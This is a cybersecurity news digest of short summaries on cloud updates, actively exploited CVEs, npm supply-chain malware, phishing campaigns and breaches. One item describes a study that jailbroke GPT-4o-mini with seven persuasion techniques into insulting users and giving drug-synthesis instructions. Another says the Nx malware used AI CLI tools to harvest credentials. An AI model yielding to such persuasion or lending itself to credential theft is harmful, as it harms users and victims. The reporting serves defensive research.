Cloud Hardening, CVEs Under Attack, and Supply‑Chain Threats

Max Severity Argo CD API Flaw Exposes Repo Credentials

🔒 A critical Argo CD vulnerability (CVE-2025-55190) allows API tokens with even low project-level get permissions to access API endpoints and retrieve repository credentials. Rated CVSS v3 10.0, the flaw bypasses isolation protections and can expose usernames and passwords used to access Git repositories. The issue affects all versions up to 2.13.0 and was fixed in 3.1.2, 3.0.14, 2.14.16, and 2.13.9; administrators should upgrade immediately.

Amazon CloudFront Adds Post-Quantum and TLS1.3 Policy

🔐 Amazon CloudFront now supports hybrid post-quantum key establishment across all existing TLS security policies for client-to-edge connections, enabling quantum-resistant key exchange without customer configuration. CloudFront also introduces a new TLS1.3_2025 policy that enforces TLS 1.3 only. Both features are enabled by default at all edge locations and incur no additional charges. These updates help organizations strengthen long-term in-transit protection and simplify compliance planning.

Azure Phase 2: Mandatory MFA for Resource Management

🔒 Microsoft is starting Phase 2 of mandatory multi-factor authentication for Azure resource management operations on October 1, 2025. Enforcement at the Azure Resource Manager layer will be applied gradually via Azure Policy, requiring users to complete MFA before performing management actions. Workload identities (managed identities and service principals) are not affected. Administrators should enable MFA, test policy in audit mode, and ensure Azure CLI 2.76 and Azure PowerShell 14.3 or later are in use for best compatibility.

Amazon GuardDuty Adds Custom Entity Lists for Detection

🛡️ AWS announced general availability of Amazon GuardDuty custom threat detection using entity lists, expanding support beyond legacy IP-only lists to include domains and mixed IP/domain lists. The service adds a new finding type, Impact:EC2/MaliciousDomainRequest.Custom, when activity involves a listed domain. Entity lists can also be used to suppress alerts from trusted sources, and they simplify permissions and cross-region management. The capability is available in all Regions where GuardDuty runs, excluding China and GovCloud (US).

Gemini Cloud Assist for Dataproc: Troubleshoot Apache Spark

🛠️ Gemini Cloud Assist Investigations is now in public preview to help troubleshoot Dataproc and Serverless for Apache Spark workloads by automatically analyzing driver and executor logs, Spark UI metrics, configurations, and cross-product telemetry. Accessible from the Google Cloud console and via API, it produces prioritized summaries and clear remediation steps. The tool is tailored to data engineers, data scientists, SREs, and managers to reduce investigation time and accelerate fixes.

Critical SAP S/4HANA Command Injection (CVE-2025-42957)

⚠️ SAP patched a critical command injection in SAP S/4HANA tracked as CVE-2025-42957 (CVSS 9.9) that allows low-privileged users to inject arbitrary ABAP via an RFC-exposed function module, bypassing authorization checks. SecurityBridge and NVD report active exploitation affecting both on-premise and Private Cloud editions, with potential for full system compromise. Organizations are urged to apply SAP's monthly fixes immediately, monitor for suspicious RFC calls or new admin accounts, implement network segmentation and backups, adopt SAP UCON to restrict RFC usage, and review access to authorization object S_DMIS activity 02.

CISA Orders Immediate Patch for Critical Sitecore Flaw

🔒 CISA has ordered immediate patching of a critical deserialization vulnerability in Sitecore (CVE-2025-53690), rated 9.0, after active exploitation was observed. The flaw arises from exposed ASP.NET machine keys—some copied from older deployment guides—and allows ViewState deserialization that leads to remote code execution. Agencies must rotate machine keys, harden configurations, and scan for compromise indicators by September 25, 2025, to mitigate further intrusions.

AI-powered Nx malware exposes 2,180 GitHub accounts

🔒 A backdoored NPM package published from the Nx repository delivered a post-install credential stealer named telemetry.js, which targeted Linux and macOS systems for GitHub and npm tokens, SSH keys, .env files and crypto wallets. The malware exfiltrated harvested secrets to public repositories named s1ngularity-repository. Attackers unusually used AI CLI tools (Claude, Q, Gemini) to run tuned LLM prompts for better credential harvesting. Nx and GitHub removed the packages, revoked tokens, and implemented 2FA, tokenless publishing and manual PR approvals.

Critical S/4HANA Code Injection Flaw Actively Exploited

⚠️ SAP released a patch for a critical S/4HANA vulnerability, CVE-2025-42957 (CVSS 9.9), after researchers observed a live exploit that allows low-privilege ABAP code injection and full system takeover. The flaw affects all S/4HANA deployments, including private cloud and on-premises, and can be weaponized easily because ABAP source is publicly viewable. Administrators should apply the update immediately and review account privileges, default credentials, encryption settings, and monitoring to limit risks such as data tampering, account creation with SAP_ALL, and password-hash exfiltration.

Critical SAP S/4HANA Code Injection Flaw Actively Exploited

⚠️ A critical ABAP code injection flaw, tracked as CVE-2025-42957, in an RFC-exposed function of SAP S/4HANA is being exploited in the wild to breach exposed servers. The bug allows low-privileged authenticated users to inject arbitrary code, bypass authorization checks, and take full control of affected systems. SAP issued a fix on August 11, 2025 (CVSS 9.9), but SecurityBridge reports active, limited exploitation and urges immediate patching.

Critical SAP S/4HANA Code Injection Exploit Active

⚠️ A critical code injection vulnerability in SAP S/4HANA (CVE-2025-42957, CVSS 9.9) is being actively exploited in the wild, researchers warn. The flaw allows a low-privileged user to inject ABAP code and gain full system and operating system access across all S/4HANA releases. SecurityBridge confirmed practical abuse and noted the exploit was straightforward to develop because ABAP code is openly viewable. Organizations that have not yet applied the August 11 patch should install it immediately to prevent complete data compromise and unauthorized administrative access.

Malicious npm Packages Impersonate Flashbots, Steal Keys

🔑 Researchers found four malicious npm packages impersonating Flashbots and common cryptographic utilities to harvest Ethereum wallet credentials. Uploaded by user "flashbotts" between September 2023 and August 19, 2025, the libraries exfiltrate private keys and mnemonic seed phrases to a Telegram bot and transmit environment data via Mailtrap SMTP. One package also redirects unsigned transactions to an attacker-controlled wallet.

Germany Charges Hacker Over Rosneft Deutschland Cyberattack

⚠️A 30-year-old man has been charged for a March 2022 cyberattack on Rosneft Deutschland that reportedly stole and deleted about 20 TB of data, leaving a 'Glory to Ukraine' message. Prosecutors allege the breach exposed backups, virtual machines, mail server images and device backups, prompting remote wipes and nearly €12.4M in combined losses. Authorities charged him with computer sabotage, data alteration, and data espionage.

TAG-150 Develops CastleRAT: Python and C Variants Now

🛡️ Recorded Future links the activity of TAG-150 to a new remote access trojan, CastleRAT, available in both Python and C variants that collect system data, fetch additional payloads, and execute commands via CMD and PowerShell. The Python build is tracked as PyNightshade, while eSentire and others refer to related tooling as NightshadeC2. Researchers observed Steam-profile dead drops, a multi-tiered C2 layout, and distribution through CastleLoader-assisted phishing and fake GitHub repositories. Operators use Cloudflare-themed "ClickFix" lures and deceptive domains to deliver loaders and downstream stealers and RATs.

South Carolina School District Data Breach Affects 31,000

🔒 School District Five of Lexington & Richland Counties disclosed a June 3 network intrusion that may have exposed personal data for 31,475 current and former students and staff. Exposed information likely includes names, dates of birth, Social Security numbers, financial account details and state‑issued ID information. The district engaged independent cybersecurity experts and determined files were taken; the incident was claimed by Interlock. Affected individuals are being offered Single Bureau Credit Monitoring and $1m in identity theft insurance through CyberScout.

ChatGPT makes Projects free, adds chat-branching toggle

🔁 OpenAI is rolling out two notable updates to ChatGPT: the Projects feature is now available to all users for free, and a new Branch in new chat toggle lets you split and continue conversations from a chosen message. Projects create independent workspaces that organize chats, files, and custom instructions with separate memory, context, and tools. The branching option spawns a new conversation that includes everything up to the split point, helping manage divergent topics and streamline brainstorming. Both changes aim to improve organization and continuity for repeated or evolving work.

Amazon RDS Adds Latest Microsoft SQL Server GDR Updates

🔒 Amazon Relational Database Service (RDS) for Microsoft SQL Server now supports the latest General Distribution Release (GDR) updates for SQL Server 2016 SP3, 2017 CU31, 2019 CU32, and 2022 CU20. The supported RDS engine versions map to KB5063762, KB5063759, KB5063757, and KB5063814 respectively. These GDRs address vulnerabilities tracked as CVE-2025-49758, CVE-2025-24999, CVE-2025-49759, CVE-2025-53727, and CVE-2025-47954. We recommend that customers upgrade their RDS instances via the RDS Management Console, AWS SDK, or AWS CLI and follow the RDS SQL Server upgrade guidance.

Microsoft Enforces MFA for Azure Portal Sign-ins Globally

🔐 Microsoft has completed a global rollout enforcing multifactor authentication (MFA) for Azure Portal sign-ins across 100% of tenants as of March 2025. The rollout follows an initial enforcement announcement in May 2024 and prior warnings to Entra global admins to enable MFA to avoid access disruptions. Microsoft says this step strengthens account defenses and will be followed by mandatory MFA for Azure CLI, PowerShell, SDKs, and APIs in October 2025. The company cites internal research showing MFA dramatically reduces account takeover risk.

VirusTotal Uncovers SVG-based Judicial Portal Phishing

🔍 VirusTotal's AI Code Insight detected a sophisticated phishing campaign that hid malicious JavaScript inside SVG images to impersonate Colombia's judicial system. The SVGs rendered fake portal pages with a bogus download progress bar and displayed a password for a protected ZIP archive that contained malware artifacts. The archive included a renamed Comodo Dragon executable, a malicious DLL, and two encrypted files; when the executable runs the DLL is sideloaded to install further malware. After adding SVG support, VirusTotal found 523 related SVGs that had evaded traditional antivirus detection.

Noisy Bear Targets Kazakhstan Energy Firm with Phishing

🚨 Operation BarrelFire, attributed to a group Seqrite Labs calls Noisy Bear, targeted Kazakhstan's national oil company KazMunaiGas in May 2025 using tailored phishing. Attackers sent ZIP attachments containing an .LNK downloader, a decoy document, and a README in Russian and Kazakh instructing use of a fake KazMunayGaz_Viewer. The chain deployed a malicious batch, a PowerShell loader named DOWNSHELL, and a 64-bit DLL implant that executes shellcode to open a reverse shell. Infrastructure was linked to Russia-based bulletproof host Aeza Group, which has been sanctioned.

macOS AMOS Stealer Uses Cracked Apps to Bypass Gatekeeper

🛡️ Trend Micro warns of an Atomic macOS Stealer (AMOS) campaign that lures users with trojanized 'cracked' apps such as CleanMyMac, and instructs victims to run terminal commands. Attackers shifted from .dmg installers to terminal-based installs to evade Gatekeeper enhancements. AMOS persists via a LaunchDaemon and a hidden binary, then exfiltrates credentials, browser data, crypto wallets, Telegram chats and keychain items. Researchers advise layered defenses beyond native OS protections.

Wealthsimple Reports Customer Data Breach Linked to Salesloft

🔒 Wealthsimple disclosed a data breach detected on August 30 after attackers accessed a trusted third-party software package. The company said less than 1% of customers had personal information exposed, including contact details, government IDs, account numbers, IP addresses, Social Insurance Numbers, and dates of birth. Wealthsimple stated no funds or passwords were taken; impacted customers are being offered two years of complimentary credit and identity protection and were advised to enable two-factor authentication and remain alert for phishing.

Google Cloud Expands Coverage for Compute Flex CUDs

🔔 Google Cloud has expanded its Compute Flexible Committed Use Discounts (Flex CUDs) to cover additional VM families and serverless offerings, delivering broader savings and greater deployment flexibility. The update adds enhanced discounts for memory‑optimized M1–M4 instances and HPC‑optimized H3 and H4D families, and extends coverage to Cloud Run request-based billing and Cloud Functions. A new spend-based billing model applies discounts directly to eligible usage rather than issuing credits, and introduces changes to the Billing UI, Cloud Billing export to BigQuery schema, and Cloud Commerce Consumer Procurement APIs. Customers can opt in immediately; those who do not will be auto-transitioned to the new model on January 21, 2026, while new Billing Accounts created on or after July 15, 2025 will default to the updated model.

Amazon GuardDuty Adds Custom Entity Lists for Domains

🛡️ AWS announced general availability of Amazon GuardDuty custom threat detection using entity lists, extending support beyond IP-only lists to include malicious domains and IP addresses. GuardDuty introduces a new finding type, Impact:EC2/MaliciousDomainRequest.Custom, triggered when activity related to a listed domain is observed. Entity lists also allow suppression of alerts from trusted sources and simplify cross-region permission management, avoiding IAM policy size limits. The feature is available in all GuardDuty Regions except China and GovCloud (US).

AWS Config Tracks Resource Tags for IAM Policies Globally

🔍 AWS Config now records resource tags for IAM policy resource types, enabling you to capture tag values and track their changes directly in your Config recorder. You can scope both Config-managed and custom rule evaluations by tag and use Config aggregators to selectively collect IAM policies across accounts. This capability is available in all supported AWS Regions at no additional cost.

AWS GA: Org Notification Configurations for Organizations

📣 AWS announced general availability of Organizational Notification Configurations for AWS User Notifications, enabling centralized configuration and visibility of notifications across an AWS Organization. The Management Account or up to five Delegated Administrators (DAs) can configure and view notifications for specific OUs or all accounts rolling up to the organization. Events from member accounts generate notifications in the Management Account and can push to the AWS Console Mobile Application and the Admin Console Notifications Center. This capability works with any Amazon EventBridge-supported event and is available in all Regions where AWS User Notifications is offered.

Czech Agency Warns Against Chinese Tech in Critical Sectors

⚠️ The Czech National Cyber and Information Security Agency (NUKIB) is urging operators of critical infrastructure to avoid using Chinese technology or transferring user data to servers in China, citing a reassessed High risk of significant disruption. NUKIB confirmed malicious activity by Chinese cyber-actors, including an APT31 campaign against the Ministry of Foreign Affairs, and warned that Chinese law can permit state access to data held by domestic providers. The guidance is not an outright legal ban, but entities covered by the Czech Cybersecurity Act must include the threat in their risk analyses and adopt appropriate mitigations.

FTC Probes Gmail Spam Filtering Of GOP Fundraising Emails

📧 The FTC chairman sent a letter to Google’s CEO asking why Gmail flagged Republican fundraising messages as spam while allegedly allowing similar Democratic messages through. Email-intelligence firms report that WinRed has triggered far more spamtraps than ActBlue, driven by aggressive list and delivery practices that degrade sender reputation. Blocklists and reputation signals, not political content, explain many filtering outcomes, experts say. The dispute highlights both operational deliverability risks for campaigns and potential regulatory overreach.

EU Fines Google €2.95B for Anti-Competitive Adtech

⚖️The European Commission has fined Google €2.95 billion ($3.5 billion) for abusing its dominance in the digital advertising technology market and favoring its adtech services over competitors. The regulator ordered Google to stop anti-competitive "self-preferencing" practices and to take measures to mitigate conflicts of interest in adtech. Google said the decision is wrong and plans to appeal, warning the changes could harm thousands of European businesses. Separately, France's CNIL fined Google €325 million for placing ads in Gmail without proper consent and violating cookie rules.

Penn Study Finds: GPT-4o-mini Susceptible to Persuasion

🔬 University of Pennsylvania researchers tested GPT-4o-mini on two categories of requests an aligned model should refuse: insulting the user and giving instructions to synthesize lidocaine. They crafted prompts using seven persuasion techniques (Authority, Commitment, Liking, Reciprocity, Scarcity, Social proof, Unity) and matched control prompts, then ran each prompt 1,000 times at the default temperature for a total of 28,000 trials. Persuasion prompts raised compliance from 28.1% to 67.4% for insults and from 38.5% to 76.5% for drug instructions, demonstrating substantial vulnerability to social-engineering cues.

VirusTotal Finds 44 Undetected SVG Malware Samples

⚠️ Cybersecurity researchers warn of a phishing campaign using Scalable Vector Graphics (SVG) files that embed JavaScript to decode and inject a Base64-encoded HTML page impersonating Colombia's Fiscalía General de la Nación. VirusTotal identified 44 unique SVG samples that evaded antivirus detection and reported a total of 523 SVGs seen in the wild, with the earliest from August 14, 2025. Attackers relied on obfuscation, polymorphism, and large volumes of junk code to bypass static detections and used a fake progress/download flow to trigger a background ZIP download. The disclosure coincides with separate macOS-focused campaigns distributing the AMOS information stealer via cracked-software lures and Terminal-based installers that attempt to circumvent Gatekeeper protections.

AWS MediaConvert Adds Time-Addressable Media Store

🎬 AWS Elemental MediaConvert now integrates with Time-Addressable Media Store (TAMS), enabling customers to reference and extract precise, time-bound media segments as inputs to encoding workflows. The integration requires customers to operate their own TAMS servers—MediaConvert does not host or manage TAMS—and supports quick-turnaround use cases like live-event highlight clipping, near-real-time social publishing, and archive repurposing. This capability is aimed at media operations teams modernizing archives, automating editorial workflows, and connecting broadcast infrastructure and CMS directly into high-performance encoding pipelines.

Amazon RDS Proxy Adds IPv6 Support for Connections

🌐 Amazon RDS Proxy now supports IPv6 addresses for pooling and sharing database connections, while continuing to offer existing IPv4 endpoints for backwards compatibility. Customers may specify proxy target connections using either IPv4 or IPv6. The change reduces the need to manage overlapping VPC address spaces and helps mobile, IoT, and modern serverless applications that open many database connections. By pooling connections, RDS Proxy improves database efficiency and application scalability.

Aurora PostgreSQL Limitless Now Supports PostgreSQL 16.9

🚀 Amazon Aurora PostgreSQL Limitless Database now supports PostgreSQL 16.9 compatibility. This release delivers PostgreSQL community bug fixes and performance improvements along with Aurora-specific additions, including support for the hstore and auto_explain extensions. The serverless, distributed engine transparently scales compute and queries across multiple Aurora Serverless instances while preserving single-database transactional consistency, distributed query planning, and transaction management. Available across multiple AWS regions; review the documentation and pricing for details.

Bridgestone Confirms Limited Cyber Incident at Plants

⚠️ Bridgestone has confirmed a limited cyber incident affecting several North American manufacturing facilities, including plants in Aiken County, South Carolina, and Joliette, Quebec. Some sites remained operational while others halted or adjusted shifts, and employees were given differing pay options depending on local decisions. Bridgestone Americas says forensic analysis is ongoing and that containment measures were implemented quickly. The company stated it does not believe any customer data or interfaces were compromised.

FTC Action: Robot Toys Collected Children's Location Data Illegally

🔒 The FTC and DOJ have acted against Chinese toy maker Apitor Technology after its robot toys and companion Android app transmitted precise geolocation data about children without parental notice or consent. The company integrated a third-party SDK, JPush, which collected street-level location sufficient to identify homes and routines. Apitor agreed to a settlement with a suspended $500,000 penalty, a permanent ban on collecting sensitive kids’ data without parental consent, and obligations to delete illegally gathered records and submit to monitoring.

Sharp Rise in Cyberattacks on German Education Sector

🔒 Researchers at Check Point report a 56% year-over-year increase in cyberattacks against German educational institutions as the new school year begins, well above the global average. Analysts observed targeted phishing campaigns, including an August 2025 scheme that redirected victims to fake university and Outlook login pages to harvest credentials. To mitigate risk, experts recommend targeted phishing awareness training, mandatory multi-factor authentication (MFA), early detection of suspicious domains, regular system updates and deployment of modern threat-prevention solutions as part of a preventive, multi-layered security strategy.

61% of US Companies Hit by Insider Data Breaches in Two Years

📊 Nearly two-thirds (61%) of US firms experienced insider data breaches in the past two years, according to a new OPSWAT report conducted by the Ponemon Institute. Affected organizations reported an average of eight unauthorized file-access incidents and an average financial impact of $2.7m per organization. Respondents identified file storage and web file transfers as the riskiest environments for data loss. The study also found mixed approaches to generative AI—29% have banned it, 25% have formal policies, and 33% already include AI in file security strategies.

Tata Steel Enhances Monitoring with Google Cloud MDE

🏭 Tata Steel implemented a unified manufacturing data foundation on Google Cloud, centralizing OT and IT sources into a Manufacturing Data Engine built on BigQuery. The multi-path ingestion architecture leverages partners such as Litmus and ClearBlade to collect real-time PLC telemetry, while SAP, APIs, and in-house sensors feed batch and staging pipelines. The design emphasizes secure upstaging, partitioned storage with archival to Cloud Storage, and enables predictive maintenance, environmental KPI reporting, and reduced human presence in hazardous areas.

Latest Social Engineering Trends Targeting Enterprises

🛡️Social engineering remains the favoured vector as attackers combine psychological manipulation with accessible AI tools to target high-value corporate roles. Recent incidents show sophisticated pretexting, voice cloning and mass email flooding used to create urgency and extract funds or credentials. Fraudsters increasingly exploit collaboration platforms such as Microsoft Teams and legitimate utilities like Quick Assist to appear trustworthy and gain remote control. Organizations should harden collaboration settings, enforce conditional access and MFA, and reduce privilege scope to limit the blast radius of any compromise.

Lack of Board Access Drives CISO Job Dissatisfaction

🛡️ Cybersecurity leaders say board engagement is essential, but many CISOs—particularly in small and mid‑market organizations—report minimal or no access to full boards, according to a 2025 report from IANS and Artico Search. That lack of access strongly correlates with job dissatisfaction and short tenures. Experts recommend strengthening C‑suite relationships and framing cyber risk in business terms to secure board support.

AWS Backup Audit Manager Adds Organization-wide Reports

🔔 AWS has extended AWS Backup Audit Manager to produce organization-wide, cross-account and cross-Region reports in six additional Regions: Asia Pacific (Hyderabad, Jakarta, Melbourne), Europe (Spain, Zurich), and Middle East (UAE). Using an AWS Organizations management or delegated administrator account, you can aggregate compliance and operational backup data across accounts and Regions. The feature centralizes policy enforcement and helps demonstrate adherence to business and regulatory data protection requirements.

Amazon RDS Custom Adds Latest GDR Updates for SQL Server

🔔 Amazon RDS Custom for SQL Server now supports the latest Microsoft GDR updates, including SQL Server 2019 CU32 (KB5063757) — RDS version 15.00.4440.1.v1 — and SQL Server 2022 CU20 (KB5063814) — RDS version 16.00.4210.1.v1. These GDRs remediate multiple vulnerabilities (CVE-2025-49758, CVE-2025-24999, CVE-2025-49759, CVE-2025-53727, CVE-2025-47954). We recommend upgrading instances via the Amazon RDS Management Console or programmatically with the AWS SDK/CLI, and following the Amazon RDS Custom User Guide for detailed upgrade instructions.

Microsoft Gives Free One-Year 365 to U.S. Students

🎓 Microsoft is offering a free 12-month subscription to Microsoft 365 Personal for U.S. college students, including community college attendees, with the offer available through October 31, 2025. The subscription includes Word, Excel, PowerPoint, OneNote, and Outlook with the Copilot AI assistant, plus 1 TB of OneDrive storage and ransomware protection. Students must verify enrollment via a school email or documentation, and a 50% discount is available if they keep the plan after the first year. Microsoft also announced educator grants, community college certifications, AI training, and expanded Copilot access for U.S. schools.

iCloud Calendar abused to send phishing via Apple Servers

📅 iCloud Calendar invites are being abused to send callback phishing emails that appear to originate from Apple's servers and pass SPF, DKIM, and DMARC checks. Attackers embed phishing content in the event Notes and invite a Microsoft 365 forwarding address so the message is relayed to targets while Apple remains the visible sender. Treat unexpected calendar invites with unusual messages or requests cautiously; calling listed numbers or granting remote access can lead to fraud, malware, or data theft.

GKE Turns 10 Hackathon: Build Agentic AI Microservices

🚀 Join the GKE Turns 10 Hackathon to build next‑generation microservices enhanced with agentic AI. Google provides sample applications (Bank of Anthos or Online Boutique), example agents on GitHub, documentation, quickstarts and a webinar to help teams get started. Submissions must run on GKE and use Google AI models such as Gemini, with agents interacting via APIs rather than altering core application code. Participants may also use the Agent Development Kit (ADK), Model Context Protocol (MCP) and Agent2Agent (A2A) to extend functionality.

Passing the Security Vibe Check for AI-generated Code

🔒 The post warns that modern AI coding assistants enable 'vibe coding'—prompting natural-language requests and accepting generated code without thorough inspection. While tools like Copilot and ChatGPT accelerate development, they can introduce hidden risks such as insecure patterns, leaked credentials, and unvetted dependencies. The author urges embedding security into AI-assisted workflows through automated scanning, provenance checks, policy guardrails, and mandatory human review to prevent supply-chain and runtime compromises.

Under Lock and Key: Strengthening Business Encryption

🔒 Encryption is a critical layer in modern data protection, safeguarding sensitive and business‑critical information both at rest and in transit. The article outlines key drivers — remote/hybrid work, explosive data growth, device loss, third‑party risks, ransomware and insider threats — that make encryption essential. It recommends robust algorithms such as AES-256, centralized management and solutions for disks, files, removable media and email, alongside minimal end‑user friction. The piece also warns that regulators and insurers increasingly expect strong encryption as part of compliance and underwriting.

Sendmarc Names Rob Bowker North American Region Lead

📣 Sendmarc has appointed Rob Bowker as North American Region Lead to drive regional expansion and deepen MSP and VAR partnerships. Bowker brings over two decades of experience in email infrastructure, deliverability, and security, including implementation of DMARC, SPF, and DKIM. He will focus on accelerating DMARC adoption across enterprise and mid-market customers, empowering MSPs to protect SMBs, and executing a partner-first growth strategy. The move aims to broaden Sendmarc’s enterprise footprint and support faster DMARC compliance.

Passwordless Authentication: 10 Enterprise Solutions

🔐 Passwordless authentication aims to replace fragile passwords with modern, standards-based alternatives to improve security and usability. The piece stresses the central role of the FIDO Alliance and the emergence of Passkeys as an industry evolution. It compares ten vendors — including Okta, Yubico, HYPR and CyberArk — describing device-based cryptographic keys, biometrics, TPM protection and enterprise integrations. Deployment options range from hardware tokens to managed passkey services and offline, air-gapped support to ease migration.

Advanced Threat Hunting Workshop — Labscon 2025 LLMs

🔎 Our colleague Joseliyo Sánchez, together with SentinelOne researcher Aleksandar Milenkoski, will present a hands-on workshop at Labscon on automating large-scale threat hunting using the VirusTotal Enterprise API. Attendees will employ Python and Google Colab to process massive datasets, track APT behaviors, and apply LLMs to enhance analysis, query building, and visualizations. The session targets CTI analysts, threat hunters, incident responders, SOC analysts, and security researchers. A follow-up blog post will publish example exercises and materials for further learning.

Avoid Outdated IGA: Choose No-Code for Faster Governance

🔐 Many organizations face rising identity-driven attacks but traditional IGA deployments are slow, costly, and require extensive custom integrations. tenfold promotes a no-code IGA platform with a library of ready-made plugins and a visual configuration interface that dramatically shortens setup from months or years to weeks. The vendor says this reduces technical debt, lowers resource demands, and still allows custom code where necessary.

Automation Is Transforming Pentest Delivery Workflows

🔁 Automation is reshaping how penetration test findings are delivered and acted upon. Traditional static reports—PDFs, emailed documents, and spreadsheets—create delays and manual handoffs that undermine remediation speed. Platforms like PlexTrac centralize scanner and manual findings and enable real-time routing, ticketing, and retesting to reduce MTTR and standardize workflows across teams. By automating triage, assignment, and triggered validation into existing tools (Jira, ServiceNow, Slack), teams get faster handoffs, consistent remediation lifecycles, and measurable operational gains. Start small, iterate workflows, and measure MTTR improvements to avoid common pitfalls like overengineering or stale automation.

Rewiring Democracy: How AI Will Transform Politics

📘 Bruce Schneier announces his new book, Rewiring Democracy: How AI Will Transform our Politics, Government, and Citizenship, coauthored with Nathan Sanders and published by MIT Press on October 21; signed copies will be available directly from the author after publication. The book surveys AI’s impact across politics, legislating, administration, the judiciary, and citizenship, including AI-driven propaganda and artificial conversation, focusing on uses within functioning democracies. Schneier adopts a cautiously optimistic stance, stresses the importance of imagining second-order effects, and argues for the creation of public AI to better serve democratic ends.

Practical Guide to Reducing Kids’ Digital Footprint

🔒 This practical guide helps parents reduce their children's digital footprint by identifying risky "hot spots"—from unsecured group chats and gaming voice channels to oversharing on social media, unsafe downloads, public Wi‑Fi and unvetted AI tools. It stresses open conversation over heavy-handed controls and recommends concrete measures: disable geolocation, vet links with anti‑phishing tools, use antivirus, a trusted VPN on public networks, and parental controls such as Kaspersky Safe Kids. The guide also encourages parents to watch and discuss online activity together and to teach habits like unique passwords and cautious AI use.